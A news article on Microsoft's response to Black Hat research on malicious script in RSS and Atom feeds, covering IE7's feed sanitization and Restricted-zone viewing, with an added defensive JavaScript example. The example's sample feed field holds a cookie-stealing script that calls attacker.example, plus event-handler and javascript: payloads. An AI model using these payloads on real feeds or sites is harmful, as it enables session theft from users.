
Walter VonKoch, Internet Explorer Program Manager, has responded on the Microsoft Team RSS Blog to the issue raised at the Black Hat conference in Las Vegas by Robert Auger and Caleb Sima of SPI Dynamics concerning vulnerabilities in RSS (Really Simple Syndication) and Atom feeds. The two researchers demonstrated how malicious JavaScript, embedded in a feed's data fields and passed off as ordinary text, could be delivered to subscribers' machines through feed injection in either format.
"We think it's good for the RSS community and users that the potential dangers of malicious script in feeds are pointed out and thereby can be addressed by application developers before any attacks materialize," stated VonKoch.
The IE program manager also described several mitigations built into IE7 and the Windows RSS Platform that are intended to neutralize malicious script in feeds. VonKoch referred to the sanitization applied when a feed is downloaded: script is removed from HTML fields such as the description and title elements, and those fields are treated as text. Because HTML tags are entity encoded before the content is handed to feed-viewing applications, including IE7's Feed View, and because the feed content is stored in the Feed Store already sanitized, JavaScript embedded in a feed reaches the viewer as inert text rather than executable markup.
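To make the two-stage approach concrete, the following is an added example written for this article; it is not Microsoft's Windows RSS Platform code and does not reproduce its implementation. It models the mitigations just described on a constructed RSS description field: active content (script blocks, inline event handlers, javascript: URLs) is stripped first, and the remaining markup is then entity encoded so that a viewer rendering the field as HTML displays any leftover tags as literal text. The sample feed text, the function names and the regular expressions are all assumptions made for the illustration.

```javascript
// Added example, not code from the Windows RSS Platform or IE7.
// Models "strip script, then entity-encode" on a single feed field.

// Constructed sample: the XML-decoded value of a hostile <description>.
const HOSTILE_DESCRIPTION =
  'Latest news <script>document.location="http://attacker.example/?c="+document.cookie</script>' +
  '<img src="x" onerror="alert(1)"><a href="javascript:alert(2)">read more</a>';

// Stage 1: remove the obvious vectors for script execution.
// (Illustrative regex filter; a production sanitizer should parse the HTML.)
function stripActiveContent(html) {
  return html
    // <script ...>...</script> blocks, then any unterminated trailing <script
    .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '')
    .replace(/<script\b[^>]*>[\s\S]*$/gi, '')
    // inline event handlers: onerror="...", onload='...', onclick=bare
    .replace(/\s+on\w+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi, '')
    // javascript:/vbscript: schemes in href or src, neutralized to "#"
    .replace(/(\s(?:href|src)\s*=\s*["']?)\s*(?:javascript|vbscript):[^"'\s>]*/gi, '$1#');
}

// Stage 2: entity-encode so whatever markup survived is shown as text.
function entityEncode(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// What a feed store would persist and hand to viewers: stripped, then encoded.
function sanitizeFeedField(html) {
  return entityEncode(stripActiveContent(html));
}

// True if the field still contains anything a browser could execute.
function containsActiveContent(field) {
  return /<script\b|\son\w+\s*=|(?:javascript|vbscript):/i.test(field) || /</.test(field);
}

console.log('raw:       ', HOSTILE_DESCRIPTION);
console.log('stripped:  ', stripActiveContent(HOSTILE_DESCRIPTION));
console.log('sanitized: ', sanitizeFeedField(HOSTILE_DESCRIPTION));
```

The stripping pass only removes the patterns it knows about, which is why the encoding pass matters: once every `<` has become `&lt;`, nothing the filter missed can be interpreted as markup, and the sanitized string is safe to store and to display as text. Note that the input here is the already XML-decoded field value; real feeds frequently carry entity-escaped HTML inside `description`, and encoding it a second time without first decoding it would garble legitimate formatting.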
"The IE7 Feed View displays feeds in the Restricted security zone, no matter where the feed originated, even if for example the feed came from a site in the Trusted Sites zone. By default script is disabled in the Restricted zone. In addition, the Feed View disallows URL Actions including script and active content," explained VonKoch.
He also advised developers who host MSHTML in their own applications to implement a custom security manager that specifies which URL Actions are permitted, keeping that set as small as possible to reduce the application's attack surface.